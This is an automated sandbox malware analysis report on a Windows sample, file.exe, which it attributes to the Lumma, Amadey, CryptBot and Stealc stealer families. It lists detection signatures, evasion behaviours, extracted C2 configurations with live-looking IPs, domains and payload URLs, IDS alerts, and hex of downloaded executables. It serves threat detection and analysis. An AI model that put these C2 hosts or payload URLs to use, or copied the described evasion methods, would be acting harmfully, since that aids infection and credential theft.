Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559716
MD5: ae0e62a9ae1f471958341b45817b6804
SHA1: e13376d4bdb2e56751dc4c52d9ad24ed55d72877
SHA256: 9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: file.exe Avira: detected
Source: https://librari-night.sbs/3O Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exePm Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/So4 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/icrosoft Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/xM Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php32g Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/random.exe5062384Sa1 Avira URL Cloud: Label: phishing
Source: http://31.41.244.11/files/Lumma111.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/well/random.exev Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs:443/apiA Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php~v Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/3n9 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Lumma111[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000000.00000002.1812668708.00000000009D1000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: cfc45d1c7c.exe.2708.12.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["p10tgrace.sbs", "3xp3cts1aim.sbs", "peepburry828.sbs", "p3ar11fter.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Lumma111[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 52%
Source: file.exe ReversingLabs: Detection: 52%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Lumma111[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_bd56902c-0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.85.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c8a61f4196.exe, 00000021.00000003.2901113043.00000000050E0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 20MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 180MB

Networking

barindex
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49742 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49748
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49781 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057662 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (p10tgrace .sbs) : 192.168.2.4:49866 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057668 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (processhol .sbs) : 192.168.2.4:58784 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057697 - Severity 1 - ET MALWARE Observed DNS Query to Lumma Stealer Domain (processhol .sbs) : 192.168.2.4:58784 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057658 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (librari-night .sbs) : 192.168.2.4:52808 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49805 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49803 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49811 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49821 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49844 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49843 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49865 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49852 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49896 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49906 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49968 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49970 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49827 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49827 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49858 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49858 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49805 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49805 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49868 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49868 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49887 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49820 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49820 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49891 -> 172.67.155.248:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: p10tgrace.sbs
Source: Malware configuration extractor URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor URLs: peepburry828.sbs
Source: Malware configuration extractor URLs: p3ar11fter.sbs
Source: Malware configuration extractor URLs: processhol.sbs
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:09 GMTContent-Type: application/octet-streamContent-Length: 4414976Last-Modified: Wed, 20 Nov 2024 18:17:36 GMTConnection: keep-aliveETag: "673e27c0-435e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 60 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 90 c5 00 00 04 00 00 d5 a3 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 4a c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 49 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 6f 75 73 7a 66 69 77 00 b0 1b 00 00 a0 a9 00 00 ac 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 69 77 6a 62 6f 71 63 00 10 00 00 00 50 c5 00 00 04 00 00 00 38 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 c5 00 00 22 00 00 00 3c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:22 GMTContent-Type: application/octet-streamContent-Length: 1871360Last-Modified: Wed, 20 Nov 2024 19:44:44 GMTConnection: keep-aliveETag: "673e3c2c-1c8e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e6 72 3b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 be 00 00 00 00 00 00 00 80 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4a 00 00 04 00 00 23 fc 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 70 05 00 70 00 00 00 00 60 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 71 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 60 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 05 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 80 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 63 62 76 76 6b 79 6d 00 00 1a 00 00 70 30 00 00 f4 19 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 76 61 78 6a 79 70 73 00 10 00 00 00 70 4a 00 00 04 00 00 00 68 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 4a 00 00 22 00 00 00 6c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
